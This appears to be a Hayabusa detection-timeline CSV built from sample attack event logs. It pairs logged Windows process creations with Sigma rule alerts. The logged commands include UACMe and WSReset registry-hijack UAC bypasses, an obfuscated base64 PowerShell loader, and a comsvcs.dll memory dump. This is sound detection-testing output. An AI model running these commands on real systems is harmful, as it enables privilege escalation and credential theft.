+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  56  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x38f87e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  c:\ProgramData\memdump.vbs notepad.exe  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3461203602-4096304019-2269080069-501  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-20  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\sqlsvc  :  Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON  :  LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
